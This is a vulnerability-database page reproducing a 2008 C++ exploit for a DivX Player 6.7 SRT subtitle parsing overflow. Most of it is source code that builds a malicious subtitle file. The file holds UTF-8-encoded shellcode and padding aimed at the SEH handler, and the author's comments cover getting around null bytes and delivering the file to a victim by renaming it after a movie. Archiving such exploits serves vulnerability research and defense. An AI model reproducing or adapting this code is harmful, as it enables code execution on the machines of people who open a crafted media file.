Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

divx-Exploit.cpp.txt

🗓️ 24 Apr 2008 00:00:00Reported by Luong Anh HoangType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Exploit for DivX Player srt subtitle parsing vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`// Exploit.cpp : Defines the entry point for the console application.  
//  
  
#include "stdafx.h"  
/***********************************************************************  
DivX Player <=6.7 srt subtitle parsing exploit   
Coded by [email protected]  
Tested on Windows XP SP2 + DivX Player 6.7.0  
  
Credit to securfrog for his PoC  
  
Actually this exploit is not relevant to DivX 6.6.0 exploit already posted in milw0rm,since the  
technique is quite different and that exploit is no use for DivX 6.7  
One of the biggest problem is shellcode being converted to unicode (so it has unwanted null byte )  
also the return address,or seh handler has the null byte too  
Another quite touch problem is address of SEH structure(at FS:[0]) is rewritten at the end of the routine  
(with some address stored in the stack which already overwritten) so that   
ollydbg will have no chance to catch any exception before the program terminated by the system  
I've tried srt with ANSI code page with no success(just crash),Unicode is either,DivX does not even recognize  
Unicode subtitle either.The last resort is UTF8,all payload,addresses is encoded in UTF8 format,so DivX will convert to unicode  
at runtine,hence.To modified this exploit,u have to convert to unicode format,fix the address and convert back to UTF8  
  
To exploit this,rename output file with the same name of the movie and load it in DivX Player.  
and the Calculator will be opened  
  
***********************************************************************/  
  
unsigned char Header[38] =  
{  
0xEF, 0xBB, 0xBF, 0x31, 0x20, 0x0D, 0x0A, 0x30, 0x30, 0x3A, 0x30, 0x30, 0x3A, 0x30, 0x31, 0x2C,   
0x30, 0x30, 0x31, 0x20, 0x2D, 0x2D, 0x3E, 0x20, 0x30, 0x30, 0x3A, 0x30, 0x30, 0x3A, 0x30, 0x32,   
0x2C, 0x30, 0x30, 0x31, 0x0D, 0x0A,   
} ;  
unsigned char ShellCode[319] =  
{  
0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86,   
0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90,   
0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9,   
0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB,   
0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1, 0x40, 0xDB, 0xAB, 0xE9, 0x82, 0x90, 0xE1, 0x86, 0xA1,   
0x40, 0xEC, 0xB3, 0x9A, 0xE7, 0x82, 0xBA, 0xE1, 0x88, 0xA3, 0xE2, 0xAD, 0xBC, 0xEB, 0x87, 0x89,   
0xED, 0xA4, 0xA3, 0xE2, 0x91, 0xB4, 0xE5, 0xBF, 0xB4, 0xE5, 0x9C, 0xB1, 0xCC, 0x97, 0xE1, 0x9D,   
0x97, 0xEB, 0x9E, 0x83, 0xEF, 0x80, 0xA7, 0xEC, 0xAE, 0x89, 0xEB, 0x83, 0x80, 0xE3, 0x8D, 0xB1,   
0xEB, 0x88, 0x91, 0xE0, 0xBC, 0xB7, 0xEB, 0xA2, 0x9A, 0xE1, 0x9E, 0xB2, 0xEA, 0xBE, 0x9D, 0xEA,   
0xA0, 0xB6, 0xEA, 0x92, 0x85, 0xE1, 0x98, 0x96, 0xE5, 0x86, 0xB7, 0xED, 0xB7, 0xA1, 0xE2, 0xBA,   
0x83, 0xE0, 0xBF, 0xB3, 0xEF, 0x83, 0x9A, 0xE6, 0x8D, 0xAD, 0xE3, 0x86, 0x99, 0xE7, 0xB3, 0xB9,   
0xE7, 0xAD, 0xA3, 0xE8, 0x8C, 0x8F, 0xE9, 0x9E, 0xA1, 0xEB, 0xA3, 0xA4, 0xE4, 0xB1, 0xB1, 0xEC,   
0xAC, 0x81, 0xDE, 0x9C, 0xE1, 0x9D, 0x96, 0xEF, 0x8D, 0x9E, 0xED, 0xB0, 0x8F, 0xE4, 0xA1, 0xAC,   
0xEB, 0xB5, 0x9B, 0xE4, 0xBD, 0xB0, 0xEC, 0xAA, 0xB0, 0xEC, 0x92, 0x95, 0xE2, 0x9D, 0x87, 0xE8,   
0x98, 0xAC, 0xEB, 0x8D, 0xA3, 0xDB, 0xAC, 0xED, 0xBE, 0xAC, 0xE2, 0xA1, 0xB9, 0xE9, 0xA8, 0x9C,   
0xED, 0x86, 0xBE, 0xE2, 0xBD, 0x90, 0xE2, 0xB9, 0xBE, 0xE5, 0xBF, 0xA2, 0xE8, 0x8D, 0xA3, 0xEF,   
0x9D, 0xBF, 0xE3, 0x82, 0x93, 0xE8, 0xB1, 0xB6, 0xE7, 0x98, 0xA4, 0xE9, 0x8A, 0x89, 0xEF, 0xB0,   
0xA4, 0xEA, 0xBB, 0xA2, 0xE3, 0x8D, 0xBB, 0xEA, 0xB8, 0x85, 0xEB, 0xAB, 0x95, 0xEA, 0xB4, 0x91,   
0xEC, 0x9C, 0x9A, 0xED, 0xA6, 0xB1, 0xEE, 0x83, 0xA4, 0xE6, 0xAB, 0x90, 0xE8, 0xA5, 0xB1, 0xDB,   
0xAB, 0xEF, 0xBA, 0x8F, 0xEF, 0x87, 0xAC, 0xE6, 0x87, 0xB3, 0xE9, 0xB9, 0xBF, 0xC3, 0xB3,   
} ;  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
FILE * file;  
char c='A';  
file=fopen("divx67eVil.srt","w+b");  
if (file==NULL)  
{  
printf("File I/O error");  
return 0;  
}  
fwrite(Header,1,sizeof(Header),file);  
for (int i=0;i<0x402;i++) fwrite(&c,1,1,file);  
fwrite(ShellCode,1,sizeof(ShellCode),file);  
for (int i=0;i<4096000;i++) fwrite(&c,1,1,file);  
fclose(file);  
printf("Done...eVil is in divx67eVil.srt");  
printf("Load it in DivX Player 6.7 with some movie en enjoy");  
return 0;  
}  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
divx playerexploitsrt subtitlevulnerability
20
.json
Report